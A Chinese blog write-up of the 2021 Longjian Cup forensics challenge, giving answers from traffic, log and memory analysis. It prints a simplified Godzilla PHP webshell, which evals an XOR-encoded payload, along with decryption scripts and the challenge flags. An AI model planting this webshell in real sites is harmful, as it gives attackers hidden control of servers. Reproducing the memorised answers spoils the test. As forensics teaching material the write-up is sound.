[陇剑杯2021] 复现

签到

此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)

NSSCTF{http} 

jwt-1

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
该网站使用了______认证方式。(如有字母请全部使用小写)

 追踪http流,包里看到token,

 就是jwt方式

 NSSCTF{jwt}

jwt-2

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin)

 

jwt-3

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
黑客获取webshell之后,权限是______?

 

 流10里面看到执行了 whoami的命令

jwt-4

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
黑客上传的恶意文件文件名是_____________。

 写入文件的命令

文件名:1.c

jwt-5

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
黑客在服务器上编译的恶意so文件,文件名是_____________。(请提交带有文件后缀的文件名,例如x.so)

 找就完了 

looter.so

 

jwt-6

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
黑客在服务器上修改了一个配置文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)

 /etc/pam.d/common-auth

webshell-1

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客登录系统使用的密码是_____________。

 

 

webshell-2

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)

修改了日志文件,搜.log文件

 

/var/www/html/data/Runtime/Logs/Home/21_08_07.log 

webshell-3

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客获取webshell之后,权限是______?

 可以找到www-data flag也就是www-data

 

webshell-4

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客写入的webshell文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)

 1.php

 

webshell-5

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写)

 

 不太理解, 还要忽略前两位然后base64

 代理工具客户端名字:frpc

webshell-6

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客代理工具的回连服务端IP是_____________。

第5题里面的写配置, 16进制转存

 192.168.239.123

webshell-7

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
黑客的socks5的连接账号、密码是______。(中间使用#号隔开,例如admin#passwd)。

 

0HDFt16cLQJ#JTN276Gp 

简单日志分析-1

某应用程序被攻击,请分析日志后作答:
黑客攻击的参数是______。(如有字母请全部使用小写)

user

简单日志分析-2

某应用程序被攻击,请分析日志后作答:
黑客查看的秘密文件的绝对路径是_____________。

 

 /Th4s_IS_VERY_Import_Fi1e

简单日志分析-3

某应用程序被攻击,请分析日志后作答:
黑客反弹shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)

 

 192.168.2.197:8888

日志分析-1

单位某应用程序被攻击,请分析日志,进行作答:
网络存在源码泄漏,源码文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)

拿到log日志 可以直接url解码一下看得更清晰 

 

www.zip 不陌生吧 

日志分析-2

分析攻击流量,黑客往/tmp目录写入一个文件,文件名为

 

sess_car 

日志分析-3

单位某应用程序被攻击,请分析日志,进行作答:
分析攻击流量,黑客使用的是______类读取了秘密文件

 SplFileObject

SQL注入-1

某应用程序被攻击,请分析日志后作答:
黑客在注入过程中采用的注入手法叫_____________。(格式为4个汉字,例如“拼搏努力”)。

 

布尔盲注 

SQL注入-2

黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_____________。(格式为“数据库名#表名#字段名”,例如database#table#column)

sqli 库 flag表 flag字段

sqli#flag#flag 

 

SQL注入-3

黑客最后获取到的flag字符串为_____________

 观察发现当注入正确时,这个位置的数字>=480  

根据这个提取正确的数据

import re

with open('sql.log','r') as file:
    lines=file.readlines()
    for line in lines:
        if (re.findall(r'200 (.+?) "-"',line))>=['479']:
            print(re.findall(r'%20=%20(.+?),1,',line))

 flag{deddcd67-bcfd-487e-b940-1217e668c7db}

 

内存分析-1

网管小王制作了一个虚拟机文件,让您来分析后作答:
虚拟机的密码是_____________。(密码中为flag{xxxx},含有空格,提交时不要去掉)

 

mimikatz

 flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

内存分析-2

虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为_____________。(解题过程中需要用到上一题答案中flag{}内的内容进行处理。

扫描桌面,有一个华为P40文件 

然后dump下来 

HUAWEI P40_2021-aa-bb xx.yy.zz.exe 为一自解压文件,解压后即为备份(直接点开dat文件)

kobackupdec华为备份解密器   

 GitHub - RealityNet/kobackupdec: Huawei backup decryptor

有bug,报错解决不来 

 

WIFI

网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:
小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。

《【陇剑杯WP】wifi题解》 - 腾讯云开发者社区-腾讯云 

 

看客户端包:

这是被加密的wifi包,有点信息 

看vmem文件:

 就梭哈文件了,win嘛直接梭哈一波rar和zip就行了

python2 vol.py -f Windows.vmem --profile=Win7SP1x86_23418 filescan | grep -E "rar|zip"

 dump出来

 加密的xml文件 ,找密码,在win能看到备注

 密码在网卡的GUID里,GUID 和接口绑定是绑定的,win7的wifi密码就存放在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]中

直接查接口!搜索Interface

python2 vol.py -f Windows.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces" 

 密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}

 打开文件

233@114514_qwe,应该是某个加密文件的密码,题目里也只剩下一个东西被加密了,那就是客户端pcap了。 

无线方面kali也有工具,用最普通的工具去跑——airdecap-ng

airdecap-ng -e My_Wifi -p 233@114514_qwe  khd.cap

参数怎么来的呢 -e 指定目标网络ssid,-p 密码

SSID=My_Wifi,密码233@114514_qwe,那么也衔接上了xml就是用来解码这个包的!

就生成了新的客户端包

最后一个http包

 

看服务端的包:
知道是上传了木马,那么肯定是通过post方式,查找post的包

 

 

 

@session_start();//创建会话
@set_time_limit(0);//防超时
@error_reporting(0);//关闭报错页
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}//加密算法,对$D进行加密
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
//这里是简化了马子,本来是三个参数再进行下面的运算
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);//base64加密
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);//session中的eval函数记录payload,这里是哥斯拉的强特征
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);//前后16位是md5,中间是base64加密
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }//将payload存入session中
    }
}

 了解到这是哥斯拉加密

根据上面的文章可以知道(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),所以我们拿到的流量要先删除前16位和后16位字符,同时Godzilla的流量还会进行一个gzip压缩,因此最外层还要用gzdecode进行一次解码。
最终解密1198号数据包的时候获取flag

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$a='fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=';
echo gzdecode(encode(base64_decode($a),'3c6e0b8a9c15224a'));
?>

flag{5db5b7b0bb74babb66e1522f3a6b1b12}

亿点复杂。。
 

IOS-1 

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:
黑客所控制的C&C服务器IP是_____________。

 全网最新最全首届“陇剑杯”网络安全大赛完整WIRTEUP --- ios(7题) - GKLBB - 博客园

 就是纯看tcp流了

15流有东西 ,就是  3.128.156.159 了

IOS-2

黑客利用的Github开源项目的名字是______。

还是这个流,有github链接,项目就是 stowaway 

 

IOS-3

通讯加密密钥的明文是____________。

打开github链接,看使用方法 

 

 密钥就是 hack4sec

IOS-4 

黑客通过SQL盲注拿到了一个敏感数据,内容是____________。

并没找到sql数据, 有很多TLS加密 

 编辑-首选项 用keylog.txt解密TLS 

然后查看http2 ,并过滤一下 得到sql数据

 吐了,才知道直接复制就行,导出半天都不是很好的效果,直接全复制,浪费时间cao

 

import re

result = open('4.txt','w')

with open('3.txt','r') as file:
    lines = file.readlines()
    for line in lines:
        result.writelines(re.findall(r'GET (.+?)WINDOW',line))
        result.writelines('\n')

 然后脚本过滤一下 再url解码一下

 找正确的值,最后16进制转一下 ,不写脚本了

746558f3-c841-456b-85d7-d6c0f2edabb2

IOS-5

黑客端口扫描的扫描器的扫描范围是____________。(格式使用“开始端口-结束端口”,例如1-65535)

就直接笨方法来过滤端口看 

 那就是 10-499 

IOS-7

黑客访问/攻击了内网的几个服务器,IP地址为____________。
(多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)

access.log 里面有172.28.0.3 

 上题sql注入 是192.168.1.12

所以就是 172.28.0.2#192.168.1.12

 

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受影响的软件或系统版本:首先,你需要确定你使用的软件或系统是否受到CVE-2021-28041漏洞的影响。可以查看相关厂商或组织发布的安全公告或漏洞报告来获取这些信息。 2. 了解漏洞的详细信息:阅读CVE-2021-28041漏洞的详细描述和相关文档,了解漏洞的原理和影响范围。这将帮助你更好地理解漏洞,并为复现做好准备。 3. 搭建实验环境:在一个安全的环境中,搭建一个与受影响软件或系统版本相匹配的实验环境。这可以是一个虚拟机、容器或者专门用于安全测试的实验环境。 4. 复现漏洞:根据漏洞的描述和相关文档,尝试复现CVE-2021-28041漏洞。这可能涉及到构造特定的输入、触发特定的操作或者利用软件或系统中的某个弱点。 5. 验证漏洞:一旦成功复现漏洞,验证漏洞的存在和影响。这可以通过观察系统行为、获取敏感信息或者执行未授权的操作来进行验证。 请注意,复现漏洞是一项敏感的活动,需要在合法授权和合法范围内进行。在进行任何安全测试之前,请确保你已经获得了相关授权,并遵守法律和道德规范。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值